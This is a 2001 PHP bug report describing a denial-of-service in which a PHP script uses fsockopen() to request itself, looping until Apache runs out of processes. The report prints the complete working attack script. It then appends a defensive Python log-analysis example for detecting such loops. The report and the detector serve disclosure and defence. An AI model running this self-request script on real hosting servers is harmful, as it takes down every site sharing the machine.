From:             [EMAIL PROTECTED]
Operating system: FreeBSD 4.4-Stable
PHP version:      4.0.6
PHP Bug Type:     Apache related
Bug description:  fsockopen() timeout terror

We have had users on our system using their PHP scripts to take down our
Apache servers.  The script uses fsockopen() to call the page that issues
the fsockopen() function. When the script calls itself the server gets into
a loop of death, spawning as many connections as httpd.conf will allow. Any
incoming connections from then on just hang and all the websites hosted on
that machine are down.  Here is a script that uses this problem to attack
Apache.

<?php

$fp = fsockopen ($HTTP_HOST, $SERVER_PORT, $errno, $errstr, 30);
if (!$fp)
{
  echo "$errstr ($errno)<br>\n";
}
else
{
  fputs ($fp, "GET $REQUEST_URI HTTP/1.0\r\nHost: $HTTP_HOST\r\n\r\n");

  while (!feof($fp))
  {
    echo fgets ($fp,128);
  }

  fclose ($fp);
}

?>


Please fix this. We really had a hard time finding the person responsible
for doing this.  They had the script in their home "public_html" directory
and the only clue we had was that in the Apache logs it was always the last
page accessed before the server freaked out and spawned over 150 Apache
processes. 


Thanks,

pHil Cogbill

3iem.net
-- 
Edit bug report at: http://bugs.php.net/?id=14372&edit=1
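
An added example, not part of the original report or of PHP: one way to spot the self-request loop described above from an Apache access log, by counting requests that the server makes to its own URIs within a short window. It assumes Common Log Format and that the server's own addresses are known; the function names, threshold, window and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}|-) \S+'
)

def find_self_request_loops(lines, server_addrs, threshold=20, window_s=10):
    """Return {uri: peak} for URIs the server itself requested at least
    `threshold` times within any `window_s`-second span."""
    own = set(server_addrs)
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if not m or m["host"] not in own:
            continue  # unparsable line, or a request from an outside client
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits[m["uri"]].append(ts)
    flagged = {}
    window = timedelta(seconds=window_s)
    for uri, stamps in hits.items():
        stamps.sort()
        start = peak = 0
        for end, ts in enumerate(stamps):  # sliding window over sorted times
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[uri] = peak
    return flagged

def constructed_sample():
    """Constructed log lines (not from the report): one outside hit, then the
    server at 192.0.2.10 requesting the same script from itself 150 times."""
    fmt = '{} - - [07/Dec/2001:10:15:{:02d} -0600] "GET {} HTTP/1.0" 200 512'
    lines = [fmt.format("198.51.100.7", 0, "/~user/loop.php")]
    lines += [fmt.format("192.0.2.10", 1 + i // 50, "/~user/loop.php")
              for i in range(150)]
    lines += [fmt.format("192.0.2.10", s, "/health.html") for s in (5, 35)]
    lines += [fmt.format("203.0.113.9", 20, "/index.html")]
    return lines

if __name__ == "__main__":
    print(find_self_request_loops(constructed_sample(), {"192.0.2.10"}))
```

If hostname lookups are enabled in the log, pass the server's own hostnames in `server_addrs` as well.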

